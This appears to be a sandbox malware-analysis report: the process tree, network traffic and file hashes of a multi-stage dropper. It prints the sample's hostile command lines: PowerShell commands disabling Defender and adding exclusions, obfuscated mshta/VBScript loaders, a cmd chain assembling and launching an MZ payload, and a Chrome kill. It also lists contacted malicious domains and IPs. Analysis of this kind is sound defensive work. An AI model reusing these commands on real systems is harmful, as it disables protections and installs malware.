PID 3140 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2660 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe
PID 2660 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe
PID 4512 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe
PID 4512 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe
PID 4512 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe
PID 1212 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe
PID 1212 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe
PID 1212 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe
PID 4216 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe
PID 4216 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe
PID 4216 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe
PID 2352 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe
PID 2352 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3140 -ip 3140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1596 -ip 1596

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1252 -ip 1252

C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$70066,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 356

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$90242,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1620 -ip 1620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 12

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1596 -ip 1596

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 640

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 824

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 632

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdcef1cc40,0x7ffdcef1cc4c,0x7ffdcef1cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3116 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 896

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4344,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1332

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5044,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
N/A 127.0.0.1:54047 tcp
N/A 127.0.0.1:54049 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 gcl-gb.biz udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 224.0.0.251:5353 udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.16:80 r11.o.lencr.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 69.5.217.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 16.176.247.72.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS08061237\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS08061237\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS08061237\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
